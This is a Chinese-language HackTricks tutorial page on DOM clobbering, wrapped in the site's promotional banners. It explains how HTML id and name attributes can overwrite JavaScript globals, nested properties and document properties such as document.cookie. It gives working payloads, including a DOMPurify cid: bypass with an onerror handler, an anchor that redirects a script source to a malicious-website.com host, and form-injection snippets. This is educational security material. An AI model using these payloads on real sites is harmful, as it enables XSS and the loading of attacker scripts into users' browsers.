从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) !
你在网络安全公司 工作吗?想要看到你的公司在HackTricks上做广告 吗?或者想要获取PEASS的最新版本或下载HackTricks的PDF 吗?查看订阅计划
基础知识
可以使用HTML标签中的**id和 name属性在JS上下文中生成 全局变量**。
复制 < form id = x ></ form >
< script > console .log ( typeof document .x) //[object HTMLFormElement] </ script > 只有 某些元素可以使用name属性 来覆盖全局变量,它们是:embed、form、iframe、image、img和object。
有趣的是,当您使用form元素 来覆盖 一个变量时,您将获得元素本身的**toString值: [object HTMLFormElement] ,但使用 anchor时, toString将是锚点的 href。因此,如果您使用 a标签来覆盖,您可以在将其视为字符串时 控制该 值**:
复制 < a href = "controlled string" id = x ></ a >
< script >
console .log (x); //controlled string
</ script > 数组和属性
也可以篡改数组 和对象属性 :
复制 < a id = x >
< a id = x name = y href = controlled >
< script >
console .log (x[ 1 ]) //controlled
console .log ( x .y) //controlled
</ script > 要覆盖第三个属性 (例如 x.y.z),您需要使用一个**form**:
复制 < form id = x name = y >< input id = z value = controlled ></ form >
< form id = x ></ form >
< script >
alert ( x . y . z .value) //controlled
</ script > 通过使用 iframes,覆盖更多属性 会变得更加复杂但仍然可能 :
复制 < iframe name = x srcdoc = "<a id=y href=controlled></a>" ></ iframe >
< style > @import 'https://google.com' ;</ style >
< script > alert ( x .y) //controlled </ script > 样式标签用于给iframe足够的时间来渲染。如果没有它,你会发现一个未定义的警报。
要深入破坏更多属性,可以使用带有HTML编码的iframe,如下所示:
复制 <iframe name=a srcdoc="<iframe srcdoc='<iframe name=c srcdoc=<a/id=d&amp;#x20;name=e&amp;#x20;href=\controlled&amp;gt;<a&amp;#x20;id=d&amp;gt; name=d>' name=b>"></iframe>
< style > @import 'https://google.com' ;</ style >
< script >
alert ( a . b . c . d .e) //controlled
</ script > 绕过过滤器
如果一个过滤器正在通过类似 document.getElementByID('x').attributes 这样的方式循环 遍历节点的属性 ,你可以覆盖 属性**.attributes并 破坏过滤器**。其他 DOM 属性如**tagName、 nodeName或 parentNode等也是可以 覆盖**的。
复制 < form id = x ></ form >
< form id = y >
< input name = nodeName >
</ form >
< script >
console .log ( document .getElementById ( 'x' ).nodeName) //FORM
console .log ( document .getElementById ( 'y' ).nodeName) //[object HTMLInputElement]
</ script > Clobbering window.someObject
在 JavaScript 中经常会发现:
复制 var someObject = window .someObject || {}; 操纵页面上的HTML允许用DOM节点覆盖someObject,可能引入安全漏洞。例如,您可以用指向恶意脚本的锚元素替换someObject:
复制 < a id = someObject href = //malicious-website.com/malicious.js ></ a > 在一个易受攻击的代码中,例如:
复制 < script >
window . onload = function (){
let someObject = window .someObject || {};
let script = document .createElement ( 'script' );
script .src = someObject .url;
document . body .appendChild (script);
};
</ script > 这种方法利用脚本源来执行不需要的代码。
技巧 :DOMPurify cid: 不会对双引号进行 URL 编码 。这意味着您可以注入一个编码的双引号,在运行时将被解码 。因此,注入类似于 <a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//"> " 在运行时解码 并从属性值中逃逸 ,以创建 onerror
另一种技术使用了一个 form id=attributes 的 input,您实际上覆盖了属性,阻止了消毒剂访问实际属性。
您可以在这篇 CTF 解密中找到这种类型的覆盖示例
覆盖文档对象
根据文档,可以使用 DOM 覆盖来覆盖文档对象的属性:
文档 接口支持命名属性 。文档 对象在任何时刻支持的属性名称包括以下内容,按照贡献它们的元素的树顺序 排列,忽略后续的重复,并且在相同元素同时贡献 id 属性和 name 属性时,来自 id 属性的值优先于来自 name 属性的值:
- 所有具有非空名称内容属性并且在文档树中具有文档作为根 的公开 embed 、form 、iframe 、img 和公开 object 元素的名称内容属性的值;
- 所有具有非空id 内容属性并且在文档树中具有文档作为根 的公开 object 元素的id 内容属性的值;
- 所有具有非空id 内容属性和非空名称内容属性的id 内容属性的值的img 元素,且在文档树中具有文档作为根 。
使用这种技术,您可以覆盖常用的值,如 document.cookie、document.body、document.children,甚至文档接口中的方法,如 document.querySelector。
复制 document .write ( "<img name=cookie />" )
document .cookie
< img name = "cookie" >
typeof(document.cookie)
'object'
//Something more sanitize friendly than a img tag
document.write("< form name =cookie><input id =toString></form>")
document.cookie
HTMLCollection(2) [img, form, cookie: img]
typeof(document.cookie)
'object 在元素被篡改后写入
对 document.getElementById() document.querySelector() <html> 或 <body> 标签来进行更改。以下是如何实现的:
复制 < div style = "display:none" id = "cdnDomain" class = "x" >test</ div >
< p >
< html id = "cdnDomain" class = "x" >clobbered</ html >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
alert ( document .querySelector ( '.x' ).innerText); // Clobbered
</ script > 此外,通过使用样式来隐藏这些注入的HTML/body标签,可以防止innerText中其他文本的干扰,从而增强攻击的效果:
复制 < div style = "display:none" id = "cdnDomain" >test</ div >
< p >existing text</ p >
< html id = "cdnDomain" >clobbered</ html >
< style >
p { display : none ;}
</ style >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script > 调查发现SVG可以有效地利用<body>标签:
复制 < div style = "display:none" id = "cdnDomain" >example.com</ div >
< svg >< body id = "cdnDomain" >clobbered</ body ></ svg >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script > 要使HTML标签在Chrome和Firefox等浏览器中在SVG内起作用,需要使用<foreignobject>标签:
复制 < div style = "display:none" id = "cdnDomain" >example.com</ div >
< svg >
< foreignobject >
< html id = "cdnDomain" >clobbered</ html >
</ foreignobject >
</ svg >
< script >
alert ( document .getElementById ( 'cdnDomain' ).innerText); // Clobbered
</ script > Clobbering Forms
可以通过在某些标签中指定form属性来向表单中添加新条目。您可以使用这种方法向表单中添加新值,甚至可以添加一个新的按钮来发送它(点击劫持或滥用一些.click() JS代码):
复制 <!--Add a new attribute and a new button to send-->
< textarea form = id-other-form name = info >
";alert(1);//
</ textarea >
< button form = id-other-form type = "submit" formaction = "/edit" formmethod = "post" >
Click to send!
</ button > 参考资料
Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker.
从零开始学习AWS黑客技术 htARTE (HackTricks AWS Red Team Expert) !
您在网络安全公司 工作吗? 您想看到您的公司在HackTricks中做广告 吗? 或者您想访问PEASS的最新版本或下载PDF格式的HackTricks 吗? 请查看订阅计划
